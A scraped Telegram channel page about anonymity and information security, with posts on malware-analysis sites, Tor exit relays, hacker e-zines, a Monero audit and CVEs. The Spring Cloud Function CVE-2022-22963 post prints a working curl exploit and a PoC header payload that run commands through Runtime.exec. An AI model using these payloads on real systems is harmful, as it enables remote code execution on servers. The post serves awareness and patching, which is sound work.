0% Privacy
6.8K subscribers
1.57K photos
53 videos
542 files
703 links
канал про анонимность, ИБ и бред автора в конвульсиях шизофрении.

The channel is about anonymity, information security and the author's delirium in the convulsions of schizophrenia.
Download Telegram
Список сайтов и инструментов(буду пополнять, пока минимум, чтобы глаза не разбегались) для анализа файлов, ссылок и их идентификации
Самый популярный
virustotal:
🦠VT bot : @VirusTotalAV_bot
🦠VT multisandbox
🦠
DrWeb
🦠DrWeb bot: @DrWebBot
🦠metadefender
🦠ESET scanner
🦠totalhash
🦠virusshare
🦠virusbay
🦠cuckoo
🦠website security check & malware scanner
🦠hybrid analysis
🦠Online Website Malware Scanner
🦠ISITPrhishing
🦠Comodo Malware Analysis Sandbox
🦠ANY.RUN(комьюнити версия - бесплатно)❤️

The list of sites and tools (I will replenish, at least for now, so that my eyes do not run away) for analyzing files, links and their identification
The most popular
virustotal:
🦠VT bot : @VirusTotalAV_bot
🦠VT multisandbox
🦠
DrWeb
🦠DrWeb bot: @DrWebBot
🦠metadefender
🦠ESET scanner
🦠totalhash
🦠virusshare
🦠virusbay
🦠cuckoo(automated malware analysis)
🦠website security check & malware scanner
🦠hybrid analysis
🦠Online Website Malware Scanner
🦠ISITPrhishing
🦠Comodo Malware Analysis Sandbox
🦠ANY.RUN(Community version free)❤️

#malware
👍3
|CVE-2022-22963|
🔥Spring4Shell.
💥CVSS:9.0
rce 0-day exploit found-in spring cloud
spring4shellFAQ
Spring4Shell scan
PoCApp

A critical security vulnerability has bloomed in the Spring Cloud Function, which could lead to remote code execution (RCE) and the compromise of an entire internet-connected host.

Пока что от Spring нет готового патча, в качестве временной меры советуют понизить версию jdk.
Прикладываю архив от
vx-underground ниже.
Ссылка на
патч, который на данный момент разрабатывается.

So far, there is no ready-made patch from Spring, as a temporary measure, it is advised to downgrade the jdk version.
I attach the archive from vx-underground below.
Link to the
patch , which is currently being developed.

The exploit is easy to execute using the curl command
:
curl -i -s -k -X $’POST’ -H $’Host: 192.168.1.2:8080′ -H $’spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec(\”touch /tmp/test”)’ –data-binary $’exploit_poc’ $’http://192.168.1.2:8080/functionRouter
#cve #exploit
CVE-2022-22963-main.zip
2.3 KB
vx-underground
пароль: infected
password: infected
poc.py
1.7 KB
PoC Payload:
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("xcalc")
|exitmap|

В продолжение поста. Это сканер, написанный на питоне, с помощью которого можно получить больше информации о exit relays(torproject), в основном про их надёжность.

In continuation of the
post. This is a scanner written in python, with which you can get more information about exit relays(torproject), mainly about their reliability.

#tor #anonymity
This media is not supported in your browser
VIEW IN TELEGRAM
🔥1
|e-zines collection(wayback machine)|

Нашёл большой список электронных зинов(e-zines) хакерской тематики, есть как старые так, и относительно новые.

I found a large list of electronic zines (e-zines) of hacker topics, there are both old and relatively new ones.

#hacking #ezine
👍1
|Monero Bulletproofs+ Security Audit|

Продолжу тему криптовалют.
Опять про монеро, только теперь про аудит безопасности системы проверки
monero bulletproofs+, также можете почитать про monero bulletproofs.

I will continue the topic of cryptocurrencies.
Again about Monroe, only now about the security audit of the
monero bulletproofs+ verification system , you can also read about monero bulletproofs.

#xmr #cryptocurrency
|CVE-2022-28128|
Untrusted search path vulnerability in AttacheCase
AttacheCase(github)

🦠В AttacheCase(программа для шифрования файлов) версии 3.6.1.0 и более ранних можно загружать DLL небезопасно(к примеру троян DLL), посредством ненадёжного поиска пути и получить привилегии для выполнения вредоносного кода.
Уязвимость была залатана и благодаря устранению этой,
предыдущая(AttacheCase3) тоже пофикшена. Для её устранения нужно просто обновиться до последней версии.

🦠In AttacheCase(file encryption software) version 3.6.1.0 and earlier, it is possible to load the DLL insecurely (for example, a Trojan DLL), through an unreliable search path and get privileges to execute malicious code.
The vulnerability was patched up and thanks to the elimination of this, the
previous one (AttacheCase3) is also fixed. To fix it, you just need to upgrade to the latest version.

#cve